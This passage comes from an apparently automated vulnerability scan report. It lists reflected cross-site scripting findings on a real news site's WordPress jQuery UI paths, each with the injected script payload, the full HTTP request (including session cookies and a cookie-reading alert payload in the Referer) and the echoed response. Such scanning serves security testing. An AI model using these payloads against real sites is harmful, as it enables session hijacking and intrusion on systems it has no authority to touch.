User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:23:21 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f083d005e3a4cb8b93fd0a8c3223fe39
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:23:23 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:23:23 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-includes/js/jquery/ui.draggable.jsd0afc\"><script>alert(1)</script>4e6d203c207?ver=1.7.1'; }); return true;" >
...[SNIP]...

4.360. http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.droppable.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-includes/js/jquery/ui.droppable.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload afa97"><script>alert(1)</script>7078a85650f was submitted in the REST URL parameter 1. This input was echoed as afa97\"><script>alert(1)</script>7078a85650f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includesafa97"><script>alert(1)</script>7078a85650f/js/jquery/ui.droppable.js?ver=1.7.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:21:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f083d005e3a4cb8b93fd0a8c3223fe39
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:21:16 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:21:16 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-includesafa97\"><script>alert(1)</script>7078a85650f/js/jquery/ui.droppable.js?ver=1.7.1'; }); return true;" >
...[SNIP]...

4.361. http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.droppable.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-includes/js/jquery/ui.droppable.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be9b3"><script>alert(1)</script>7661972d672 was submitted in the REST URL parameter 2. This input was echoed as be9b3\"><script>alert(1)</script>7661972d672 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/jsbe9b3"><script>alert(1)</script>7661972d672/jquery/ui.droppable.js?ver=1.7.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:22:13 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f083d005e3a4cb8b93fd0a8c3223fe39
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:22:15 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:22:15 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-includes/jsbe9b3\"><script>alert(1)</script>7661972d672/jquery/ui.droppable.js?ver=1.7.1'; }); return true;" >
...[SNIP]...

4.362. http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.droppable.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-includes/js/jquery/ui.droppable.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec32c"><script>alert(1)</script>20825b10b87 was submitted in the REST URL parameter 3. This input was echoed as ec32c\"><script>alert(1)</script>20825b10b87 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js/jqueryec32c"><script>alert(1)</script>20825b10b87/ui.droppable.js?ver=1.7.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:23:23 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f083d005e3a4cb8b93fd0a8c3223fe39
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:23:25 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:23:25 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-includes/js/jqueryec32c\"><script>alert(1)</script>20825b10b87/ui.droppable.js?ver=1.7.1'; }); return true;" >
...[SNIP]...

4.363. http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.droppable.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-includes/js/jquery/ui.droppable.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6e3a"><script>alert(1)</script>a5cce0ede9d was submitted in the REST URL parameter 4. This input was echoed as d6e3a\"><script>alert(1)</script>a5cce0ede9d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js/jquery/ui.droppable.jsd6e3a"><script>alert(1)</script>a5cce0ede9d?ver=1.7.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:24:32 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f083d005e3a4cb8b93fd0a8c3223fe39
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:24:34 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:24:34 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-includes/js/jquery/ui.droppable.jsd6e3a\"><script>alert(1)</script>a5cce0ede9d?ver=1.7.1'; }); return true;" >
...[SNIP]...

4.364. http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.resizable.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-includes/js/jquery/ui.resizable.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e736"><script>alert(1)</script>690b594346e was submitted in the REST URL parameter 1. This input was echoed as 4e736\"><script>alert(1)</script>690b594346e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes4e736"><script>alert(1)</script>690b594346e/js/jquery/ui.resizable.js?ver=1.7.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:22:11 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f083d005e3a4cb8b93fd0a8c3223fe39
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:22:14 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:22:14 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-includes4e736\"><script>alert(1)</script>690b594346e/js/jquery/ui.resizable.js?ver=1.7.1'; }); return true;" >
...[SNIP]...

4.365. http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.resizable.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-includes/js/jquery/ui.resizable.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eeee1"><script>alert(1)</script>eb381eb2b86 was submitted in the REST URL parameter 2. This input was echoed as eeee1\"><script>alert(1)</script>eb381eb2b86 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/jseeee1"><script>alert(1)</script>eb381eb2b86/jquery/ui.resizable.js?ver=1.7.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:23:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f083d005e3a4cb8b93fd0a8c3223fe39
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:23:16 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:23:16 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-includes/jseeee1\"><script>alert(1)</script>eb381eb2b86/jquery/ui.resizable.js?ver=1.7.1'; }); return true;" >
...[SNIP]...

4.366. http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.resizable.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-includes/js/jquery/ui.resizable.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80b15"><script>alert(1)</script>c094cfc6fba was submitted in the REST URL parameter 3. This input was echoed as 80b15\"><script>alert(1)</script>c094cfc6fba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js/jquery80b15"><script>alert(1)</script>c094cfc6fba/ui.resizable.js?ver=1.7.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:24:20 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f083d005e3a4cb8b93fd0a8c3223fe39
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:24:23 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:24:23 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-includes/js/jquery80b15\"><script>alert(1)</script>c094cfc6fba/ui.resizable.js?ver=1.7.1'; }); return true;" >
...[SNIP]...

4.367. http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.resizable.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-includes/js/jquery/ui.resizable.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f12b"><script>alert(1)</script>d80fd94c6a8 was submitted in the REST URL parameter 4. This input was echoed as 7f12b\"><script>alert(1)</script>d80fd94c6a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js/jquery/ui.resizable.js7f12b"><script>alert(1)</script>d80fd94c6a8?ver=1.7.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:25:10 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f083d005e3a4cb8b93fd0a8c3223fe39
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:25:11 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:25:11 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-includes/js/jquery/ui.resizable.js7f12b\"><script>alert(1)</script>d80fd94c6a8?ver=1.7.1'; }); return true;" >
...[SNIP]...

4.368. http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.selectable.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-includes/js/jquery/ui.selectable.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2965"><script>alert(1)</script>a48d1e98cf8 was submitted in the REST URL parameter 1. This input was echoed as a2965\"><script>alert(1)</script>a48d1e98cf8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includesa2965"><script>alert(1)</script>a48d1e98cf8/js/jquery/ui.selectable.js?ver=1.7.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:21:52 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f083d005e3a4cb8b93fd0a8c3223fe39
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:21:54 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:21:54 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-includesa2965\"><script>alert(1)</script>a48d1e98cf8/js/jquery/ui.selectable.js?ver=1.7.1'; }); return true;" >
...[SNIP]...

4.369. http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.selectable.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-includes/js/jquery/ui.selectable.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6849a"><script>alert(1)</script>55d79ba84cf was submitted in the REST URL parameter 2. This input was echoed as 6849a\"><script>alert(1)</script>55d79ba84cf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js6849a"><script>alert(1)</script>55d79ba84cf/jquery/ui.selectable.js?ver=1.7.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:22:58 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f083d005e3a4cb8b93fd0a8c3223fe39
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:23:00 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:23:00 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
